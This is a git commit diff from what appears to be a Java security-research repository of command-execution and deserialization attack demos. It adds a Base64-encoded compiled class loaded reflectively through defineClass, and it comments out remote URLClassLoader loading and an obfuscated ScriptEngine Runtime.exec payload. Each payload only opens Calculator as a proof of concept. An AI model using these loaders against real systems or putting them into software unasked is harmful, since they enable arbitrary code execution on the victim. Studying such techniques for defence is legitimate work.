sync :)

Author: Whoopsunix

Command/src/main/java/org/command/exec/ScriptEngineDemo.java

@@ -28,14 +28,14 @@ public static InputStream exec(String cmd) throws Exception {
 //                "    print(line); " +
 //                "}");
         // 直接返回对象
-        Object obj = engine.eval("var runtime = java.lang./**/Runtime./**/getRuntime();" +
-                "var process = runtime.exec(\"hostname\");" +
-                "var inputStream = process.getInputStream();" +
-                "var scanner = new java.util.Scanner(inputStream,\"GBK\").useDelimiter(\"\\\\A\");" +
-                "var result = scanner.hasNext() ? scanner.next() : \"\";" +
-                "scanner.close();" +
-                "result;");
-        System.out.println(obj.toString());
+//        Object obj = engine.eval("var runtime = java.lang./**/Runtime./**/getRuntime();" +
+//                "var process = runtime.exec(\"hostname\");" +
+//                "var inputStream = process.getInputStream();" +
+//                "var scanner = new java.util.Scanner(inputStream,\"GBK\").useDelimiter(\"\\\\A\");" +
+//                "var result = scanner.hasNext() ? scanner.next() : \"\";" +
+//                "scanner.close();" +
+//                "result;");
+//        System.out.println(obj.toString());
 
 
         engine.eval("var runtime = java.lang./**/Runtime./**/getRuntime(); " +

Command/src/main/java/org/command/exec/jni/JniCmdDemo.java

@@ -7,7 +7,6 @@
  * @author Whoopsunix
  * 手动指定lib
  * @Ref: https://github.com/javaweb-sec/javaweb-sec
- * ProcessImpl & UnixProcess by unsafe + Native
  */
 public class JniCmdDemo {
 

Command/src/main/java/org/command/exec/jni/JniCmdDemo2.java

@@ -9,7 +9,6 @@
  * @author Whoopsunix
  * 写lib到临时目录
  * @Ref: https://github.com/javaweb-sec/javaweb-sec
- * ProcessImpl & UnixProcess by unsafe + Native
  */
 public class JniCmdDemo2 {
     /**

Serialization/AttackJar/pom.xml

@@ -14,7 +14,11 @@
     </properties>
 
     <dependencies>
-
+        <dependency>
+            <groupId>org.tools</groupId>
+            <artifactId>Utils</artifactId>
+            <version>1.0-SNAPSHOT</version>
+        </dependency>
     </dependencies>
 
     <build>

Serialization/AttackJar/src/main/java/org/example/Exec.java

@@ -5,12 +5,16 @@
  */
 public class Exec {
     public Exec() {
+        try {
+            Runtime.getRuntime().exec("open -a Calculator.app");
+        } catch (Exception e) {
+        }
     }
 
     static {
         try {
             Runtime.getRuntime().exec("open -a Calculator.app");
-        } catch (Exception e){
+        } catch (Exception e) {
         }
     }
 }

Serialization/AttackJar/src/main/java/org/example/Run.java

@@ -1,5 +1,8 @@
 package org.example;
 
+import java.lang.reflect.Method;
+import java.util.Base64;
+
 /**
  * @author Whoopsunix
  */
@@ -21,16 +24,16 @@ public static void main(String[] args) throws Exception {
         /**
          * 调用构造方法
          */
-        java.net.URL url = new java.net.URL("http://127.0.0.1:1234/AttackJar-1.0.jar");
-        java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[]{url});
-        Class<?> loadedClass = classLoader.loadClass("org.example.ExecArg");
-        // public
-//        Object object = loadedClass.getConstructor(String.class).newInstance("open -a Calculator.app");
-        // private
-        Class cls = String.class;
-        java.lang.reflect.Constructor constructor = loadedClass.getDeclaredConstructor(cls);
-        constructor.setAccessible(true);
-        Object object = constructor.newInstance("open -a Calculator.app");
+//        java.net.URL url = new java.net.URL("http://127.0.0.1:1234/AttackJar-1.0.jar");
+//        java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[]{url});
+//        Class<?> loadedClass = classLoader.loadClass("org.example.ExecArg");
+//        // public
+////        Object object = loadedClass.getConstructor(String.class).newInstance("open -a Calculator.app");
+//        // private
+//        Class cls = String.class;
+//        java.lang.reflect.Constructor constructor = loadedClass.getDeclaredConstructor(cls);
+//        constructor.setAccessible(true);
+//        Object object = constructor.newInstance("open -a Calculator.app");
 
         /**
          * 调用方法
@@ -41,5 +44,22 @@ public static void main(String[] args) throws Exception {
 //        Object object = loadedClass.newInstance();
 //        loadedClass.getMethod("exec", String.class).invoke(object, "open -a Calculator.app");
 
+
+        /**
+         * Base64解密后加载
+         */
+        // generate
+//        String b64Str = new B64().encodeJavaClass(Exec.class);
+
+        String b64Str = "yv66vgAAADQAIgoABwAVCgAWABcIABgKABYAGQcAGgcAGwcAHAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQASTG9yZy9leGFtcGxlL0V4ZWM7AQANU3RhY2tNYXBUYWJsZQcAGwcAGgEACDxjbGluaXQ+AQAKU291cmNlRmlsZQEACUV4ZWMuamF2YQwACAAJBwAdDAAeAB8BABZvcGVuIC1hIENhbGN1bGF0b3IuYXBwDAAgACEBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAQb3JnL2V4YW1wbGUvRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABgAHAAAAAAACAAEACAAJAAEACgAAAGoAAgACAAAAEiq3AAG4AAISA7YABFenAARMsQABAAQADQAQAAUAAwALAAAAFgAFAAAABwAEAAkADQALABAACgARAAwADAAAAAwAAQAAABIADQAOAAAADwAAABAAAv8AEAABBwAQAAEHABEAAAgAEgAJAAEACgAAAE8AAgABAAAADrgAAhIDtgAEV6cABEuxAAEAAAAJAAwABQADAAsAAAASAAQAAAAQAAkAEgAMABEADQATAAwAAAACAAAADwAAAAcAAkwHABEAAAEAEwAAAAIAFA==";
+
+        byte[] bytes = Base64.getDecoder().decode(b64Str);
+//        ClassLoader classLoader = this.getClass().getClassLoader();
+        ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
+
+        Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
+        defineClassMethod.setAccessible(true);
+        Class<?> loadedClass = (Class<?>) defineClassMethod.invoke(classLoader, bytes, 0, bytes.length);
+        loadedClass.newInstance();
     }
 }